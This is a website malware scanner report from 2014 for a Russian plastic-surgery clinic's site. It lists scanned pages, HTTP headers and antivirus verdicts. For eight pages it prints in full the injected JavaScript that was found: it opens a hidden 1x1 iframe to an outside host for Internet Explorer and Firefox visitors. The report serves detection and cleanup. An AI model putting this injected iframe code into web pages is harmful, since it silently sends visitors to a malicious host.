New scan:

Malware Scanner report for plastic-surgery.vl.ru

Malicious/Suspicious/Total urls checked
8/0/16
8 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/8
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://plastic-surgery.vl.ru/
200 OK
Content-Length: 7652
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}

Antivirus reports:

AntiVir
JS/iFrame.cgx
Avast
JS:Iframe-WM [Trj]
Ikarus
Trojan.Script
Rising
Trojan.Script.JS.Iframe.x
nProtect
Trojan.JS.Iframe.CGX
K7AntiVirus
Riskware
TrendMicro-HouseCall
TROJ_GEN.RCBH1KE
Comodo
TrojWare.JS.Iframe.DP
McAfee-GW-Edition
HTML/IFrame.gen.d
TrendMicro
TROJ_GEN.RCBH1KE
Microsoft
Trojan:JS/Iframe.BT
MicroWorld-eScan
Trojan.JS.Iframe.CGX
McAfee
HTML/IFrame.gen.d
NANO-Antivirus
Trojan.Url.IframeB.vfwbi
F-Secure
Trojan.JS.Iframe.CGX
F-Prot
JS/IFrame.OA.gen
AVG
HTML/Framer
Norman
Iframe.RI
GData
Trojan.JS.Iframe.CGX
Commtouch
JS/IFrame.OA.gen
BitDefender
Trojan.JS.Iframe.CGX

http://plastic-surgery.vl.ru/wp-content/themes/clear/jquery-1.6.4.min.js
200 OK
Content-Length: 238045
Content-Type: application/javascript
clean
http://plastic-surgery.vl.ru/wp-content/themes/clear/common.js
200 OK
Content-Length: 1327
Content-Type: application/javascript
clean
http://plastic-surgery.vl.ru/wp-content/themes/clear/js/typeface-0.15.js
200 OK
Content-Length: 24164
Content-Type: application/javascript
clean
http://plastic-surgery.vl.ru/wp-content/themes/clear/js/artscript_regular.typeface.js
200 OK
Content-Length: 223073
Content-Type: application/javascript
clean
http://plastic-surgery.vl.ru/contacts/
200 OK
Content-Length: 6545
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}

Antivirus reports:

AntiVir
JS/iFrame.cgx
Avast
JS:Iframe-WM [Trj]
Ikarus
Trojan.Script
Rising
Trojan.Script.JS.Iframe.x
nProtect
Trojan.JS.Iframe.CGX
K7AntiVirus
Riskware
TrendMicro-HouseCall
TROJ_GEN.RCBH1KE
Comodo
TrojWare.JS.Iframe.DP
McAfee-GW-Edition
HTML/IFrame.gen.d
TrendMicro
TROJ_GEN.RCBH1KE
Microsoft
Trojan:JS/Iframe.BT
MicroWorld-eScan
Trojan.JS.Iframe.CGX
McAfee
HTML/IFrame.gen.d
NANO-Antivirus
Trojan.Url.IframeB.vfwbi
F-Secure
Trojan.JS.Iframe.CGX
F-Prot
JS/IFrame.OA.gen
AVG
HTML/Framer
Norman
Iframe.RI
GData
Trojan.JS.Iframe.CGX
Commtouch
JS/IFrame.OA.gen
BitDefender
Trojan.JS.Iframe.CGX

http://plastic-surgery.vl.ru/question/
200 OK
Content-Length: 8771
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}

Antivirus reports:

AntiVir
JS/iFrame.cgx
Avast
JS:Iframe-WM [Trj]
Ikarus
Trojan.Script
Rising
Trojan.Script.JS.Iframe.x
nProtect
Trojan.JS.Iframe.CGX
K7AntiVirus
Riskware
TrendMicro-HouseCall
TROJ_GEN.RCBH1KE
Comodo
TrojWare.JS.Iframe.DP
McAfee-GW-Edition
HTML/IFrame.gen.d
TrendMicro
TROJ_GEN.RCBH1KE
Microsoft
Trojan:JS/Iframe.BT
MicroWorld-eScan
Trojan.JS.Iframe.CGX
McAfee
HTML/IFrame.gen.d
NANO-Antivirus
Trojan.Url.IframeB.vfwbi
F-Secure
Trojan.JS.Iframe.CGX
F-Prot
JS/IFrame.OA.gen
AVG
HTML/Framer
Norman
Iframe.RI
GData
Trojan.JS.Iframe.CGX
Commtouch
JS/IFrame.OA.gen
BitDefender
Trojan.JS.Iframe.CGX

http://plastic-surgery.vl.ru/price/
200 OK
Content-Length: 5122
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}

Antivirus reports:

AntiVir
JS/iFrame.cgx
Avast
JS:Iframe-WM [Trj]
Ikarus
Trojan.Script
Rising
Trojan.Script.JS.Iframe.x
nProtect
Trojan.JS.Iframe.CGX
K7AntiVirus
Riskware
TrendMicro-HouseCall
TROJ_GEN.RCBH1KE
Comodo
TrojWare.JS.Iframe.DP
McAfee-GW-Edition
HTML/IFrame.gen.d
TrendMicro
TROJ_GEN.RCBH1KE
Microsoft
Trojan:JS/Iframe.BT
MicroWorld-eScan
Trojan.JS.Iframe.CGX
McAfee
HTML/IFrame.gen.d
NANO-Antivirus
Trojan.Url.IframeB.vfwbi
F-Secure
Trojan.JS.Iframe.CGX
F-Prot
JS/IFrame.OA.gen
AVG
HTML/Framer
Norman
Iframe.RI
GData
Trojan.JS.Iframe.CGX
Commtouch
JS/IFrame.OA.gen
BitDefender
Trojan.JS.Iframe.CGX

http://plastic-surgery.vl.ru/surgeon/
200 OK
Content-Length: 27763
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}

Antivirus reports:

AntiVir
JS/iFrame.cgx
Avast
JS:Iframe-WM [Trj]
Ikarus
Trojan.Script
Rising
Trojan.Script.JS.Iframe.x
nProtect
Trojan.JS.Iframe.CGX
K7AntiVirus
Riskware
TrendMicro-HouseCall
TROJ_GEN.RCBH1KE
Comodo
TrojWare.JS.Iframe.DP
McAfee-GW-Edition
HTML/IFrame.gen.d
TrendMicro
TROJ_GEN.RCBH1KE
Microsoft
Trojan:JS/Iframe.BT
MicroWorld-eScan
Trojan.JS.Iframe.CGX
McAfee
HTML/IFrame.gen.d
NANO-Antivirus
Trojan.Url.IframeB.vfwbi
F-Secure
Trojan.JS.Iframe.CGX
F-Prot
JS/IFrame.OA.gen
AVG
HTML/Framer
Norman
Iframe.RI
GData
Trojan.JS.Iframe.CGX
Commtouch
JS/IFrame.OA.gen
BitDefender
Trojan.JS.Iframe.CGX

http://plastic-surgery.vl.ru/operation/
200 OK
Content-Length: 24168
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}

Antivirus reports:

AntiVir
JS/iFrame.cgx
Avast
JS:Iframe-WM [Trj]
Ikarus
Trojan.Script
Rising
Trojan.Script.JS.Iframe.x
nProtect
Trojan.JS.Iframe.CGX
K7AntiVirus
Riskware
TrendMicro-HouseCall
TROJ_GEN.RCBH1KE
Comodo
TrojWare.JS.Iframe.DP
McAfee-GW-Edition
HTML/IFrame.gen.d
TrendMicro
TROJ_GEN.RCBH1KE
Microsoft
Trojan:JS/Iframe.BT
MicroWorld-eScan
Trojan.JS.Iframe.CGX
McAfee
HTML/IFrame.gen.d
NANO-Antivirus
Trojan.Url.IframeB.vfwbi
F-Secure
Trojan.JS.Iframe.CGX
F-Prot
JS/IFrame.OA.gen
AVG
HTML/Framer
Norman
Iframe.RI
GData
Trojan.JS.Iframe.CGX
Commtouch
JS/IFrame.OA.gen
BitDefender
Trojan.JS.Iframe.CGX

http://plastic-surgery.vl.ru/prices
404 Not Found
Content-Length: 0
Content-Type: text/html
clean
http://plastic-surgery.vl.ru/test404page.js
404 Not Found
Content-Length: 0
Content-Type: text/html
clean
http://plastic-surgery.vl.ru/risk
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 04 Jul 2014 17:39:15 GMT
Location: http://plastic-surgery.vl.ru/risk/
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.27
clean
http://plastic-surgery.vl.ru/risk/
200 OK
Content-Length: 15611
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}

Antivirus reports:

AntiVir
JS/iFrame.cgx
Avast
JS:Iframe-WM [Trj]
Ikarus
Trojan.Script
Rising
Trojan.Script.JS.Iframe.x
nProtect
Trojan.JS.Iframe.CGX
K7AntiVirus
Riskware
TrendMicro-HouseCall
TROJ_GEN.RCBH1KE
Comodo
TrojWare.JS.Iframe.DP
McAfee-GW-Edition
HTML/IFrame.gen.d
TrendMicro
TROJ_GEN.RCBH1KE
Microsoft
Trojan:JS/Iframe.BT
MicroWorld-eScan
Trojan.JS.Iframe.CGX
McAfee
HTML/IFrame.gen.d
NANO-Antivirus
Trojan.Url.IframeB.vfwbi
F-Secure
Trojan.JS.Iframe.CGX
F-Prot
JS/IFrame.OA.gen
AVG
HTML/Framer
Norman
Iframe.RI
GData
Trojan.JS.Iframe.CGX
Commtouch
JS/IFrame.OA.gen
BitDefender
Trojan.JS.Iframe.CGX

http://plastic-surgery.vl.ru/surgeon/untitled-16/
200 OK
Content-Length: 10798
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var url="http://onmouseup.info/stats.php";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}

Antivirus reports:

AntiVir
JS/iFrame.cgx
Avast
JS:Iframe-WM [Trj]
Ikarus
Trojan.Script
Rising
Trojan.Script.JS.Iframe.x
nProtect
Trojan.JS.Iframe.CGX
K7AntiVirus
Riskware
TrendMicro-HouseCall
TROJ_GEN.RCBH1KE
Comodo
TrojWare.JS.Iframe.DP
McAfee-GW-Edition
HTML/IFrame.gen.d
TrendMicro
TROJ_GEN.RCBH1KE
Microsoft
Trojan:JS/Iframe.BT
MicroWorld-eScan
Trojan.JS.Iframe.CGX
McAfee
HTML/IFrame.gen.d
NANO-Antivirus
Trojan.Url.IframeB.vfwbi
F-Secure
Trojan.JS.Iframe.CGX
F-Prot
JS/IFrame.OA.gen
AVG
HTML/Framer
Norman
Iframe.RI
GData
Trojan.JS.Iframe.CGX
Commtouch
JS/IFrame.OA.gen
BitDefender
Trojan.JS.Iframe.CGX

http://plastic-surgery.vl.ru/wp-content/uploads/2011/10/Untitled-16.jpg
200 OK
Content-Length: 181351
Content-Type: image/jpeg
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: plastic-surgery.vl.ru

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 04 Jul 2014 17:39:09 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_fcgid/2.3.6
Content-Type: text/html; charset=UTF-8
Link: <http://plastic-surgery.vl.ru/>; rel=shortlink
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: plastic-surgery.vl.ru
Referer: http://www.google.com/search?q=plastic-surgery.vl.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=plastic-surgery.vl.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://plastic-surgery.vl.ru/

Result: plastic-surgery.vl.ru is not infected or malware details are not published yet.